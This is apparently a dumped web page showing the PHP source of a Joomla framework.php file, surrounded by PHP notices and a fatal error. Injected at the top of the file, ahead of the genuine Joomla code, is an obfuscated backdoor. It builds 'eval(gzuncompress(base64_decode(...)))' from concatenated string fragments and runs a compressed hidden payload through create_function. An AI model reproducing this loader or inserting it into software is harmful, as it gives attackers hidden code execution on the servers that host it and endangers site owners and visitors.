Notice: Undefined index: bannerid in /home/mywab/fotohosting.org/includes/defines.php on line 22
Notice: Undefined index: category in /home/mywab/fotohosting.org/includes/defines.php on line 23
Notice: Undefined variable: define_key in /home/mywab/fotohosting.org/includes/defines.php on line 26
Warning: assert(): Assertion "" failed in /home/mywab/fotohosting.org/includes/defines.php on line 27
php $liciens = "@Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eF6VVW1v2zYQ/isOYIQS7Mgvkm0pntashbEFG9otTVYMrSFQ0lniLIkKScU1yvz3HqUEiQvPwD7ojuS933Ok+rGAkESk55CokYaBaDeGsJQs2cayvMCfDTzPn9g/m2VP657kyRZUlBRcgtUXG9teQiHhWynlfRHdNyD25njYF/BMMJK9fER/TEpQVj969+HD79erz0awtu1vV3iacL5l6BCPhocKg8lQsRIse+DPgtliSEak82ZdHSqGIQmm3mLs+hNic/Gf4oV/WhycFPtjciRlMveC6djzZ3M3mHlI/MAdz3xv7vlu4JEjFZjWhBjk4+rm79XNZ6mEgAcLmeJNXYOwCBNNpCQ09wiMba+X/UawVxbkZvXX3erjbXR3c03Wy6t+zmV4yp+SPI9qpfLWWwsvZjnwXM9HeHFp4KVC0H2EpiBafFsQOwyHJsIz3KykGSQCqIKN4GWG7jrUNwgO0tOlCUDHIF6yyYGmKHhSJe4bliVOXSozjCPJcjUyq20CedIeJYljeCa4YRfurj0dXdathcp7lxVn7ZK2BvwPYiM7l8DbKcfeIxN014gCqoSn3SwblZoKWoICEX7pb2G/4yJFM9xIOG9EOEG7IxWFr0s6x5p+8E5yperLkSnDtBEpqptmfmVquctZAZbrB/6FITY6fqCFZQAfPhGZmb4iO91YVUFGET7ZHCDtBq73U6kiQavUmkz8+XC68FzbrgVkqF0XNMEGGHiX/x87y5tPFheGDNzFYnFhiP0GTaqkrNvrYV8+x8YrNBkaVbsdwLOXaf7t9vbP6A530S+/rt7fkrW5hCfEeCHbe3rW1lBSleQWGcWUpY1OsO8a21+A/uS+i/SqUPS60p8yUBqzgK+a0YiKJNc051yzrKT6LVe6ZjiEmpYxGv5D3wq+05xnuIlRWFJWOCNGOjDwDcACDmK3np1OT2i+dUSjH7ZOwjsnjk6bZGs+LXnGGy1zqDBwRR9MUF44SRda6B1TOH+aVVLRDLOqzK4rrVFNDEideN/lzdOKb3VT8ExvEMWYO1pCW9veFIf5yAo9y5JNtYgTR8esyro6zONtqjgso3ZiLFxiRLkvYy51lQrOUl2ytNYgGMgvvflY5yqJNI9xcPW/0xI06jJaoVbFdJ3zCl5aZYA/++HtJ2kB+N/BOcJ/zfq4ztP/oRUdpBjSNK1gJzXeuoxJ051wA5DGFJsbFqa7SiNjlVPntaZp+XqFBoIqxqsuQ8G6EGbVOwt75nU+8sA//RwWx97yx8fH701Gaes=')));";$release_this = "cre"."ate_"."function";@$dle_func = $release_this('', "$liciens;");$dle_func('');
/**
* @version $Id: framework.php 22952 2012-03-27 00:40:16Z dextercowley $
* @package Joomla
* @copyright Copyright (C) 2005 - 2012 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/
// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );
/*
* Joomla! system checks
*/
@set_magic_quotes_runtime( 0 );
@ini_set('zend.ze1_compatibility_mode', '0');
/*
* Installation check, and check on removal of the install directory.
*/
if (!file_exists( JPATH_CONFIGURATION . DS . 'configuration.php' ) || (filesize( JPATH_CONFIGURATION . DS . 'configuration.php' ) < 10) || file_exists( JPATH_INSTALLATION . DS . 'index.php' )) {
if( file_exists( JPATH_INSTALLATION . DS . 'index.php' ) ) {
header( 'Location: installation/index.php' );
exit();
} else {
echo 'No configuration file found and no installation code available. Exiting...';
exit();
}
}
/*
* Joomla! system startup
*/
// System includes
require_once( JPATH_LIBRARIES .DS.'joomla'.DS.'import.php');
// Pre-Load configuration
require_once( JPATH_CONFIGURATION .DS.'configuration.php' );
// System configuration
$CONFIG = new JConfig();
if (@$CONFIG->error_reporting === 0) {
error_reporting( 0 );
} else if (@$CONFIG->error_reporting > 0) {
error_reporting( $CONFIG->error_reporting );
ini_set( 'display_errors', 1 );
}
define( 'JDEBUG', $CONFIG->debug );
unset( $CONFIG );
/*
* Joomla! framework loading
*/
// Include object abstract class
require_once(JPATH_SITE.DS.'libraries'.DS.'joomla'.DS.'utilities'.DS.'compat'.DS.'compat.php');
// System profiler
if (JDEBUG) {
jimport( 'joomla.error.profiler' );
$_PROFILER =& JProfiler::getInstance( 'Application' );
}
// Joomla! library imports;
jimport( 'joomla.application.menu' );
jimport( 'joomla.user.user');
jimport( 'joomla.environment.uri' );
jimport( 'joomla.html.html' );
jimport( 'joomla.utilities.utility' );
jimport( 'joomla.event.event');
jimport( 'joomla.event.dispatcher');
jimport( 'joomla.language.language');
jimport( 'joomla.utilities.string' );
?>
Notice: Use of undefined constant JDEBUG - assumed 'JDEBUG' in /home/mywab/fotohosting.org/index.php on line 26
Notice: Undefined variable: _PROFILER in /home/mywab/fotohosting.org/index.php on line 26
Fatal error: Call to a member function mark() on null in /home/mywab/fotohosting.org/index.php on line 26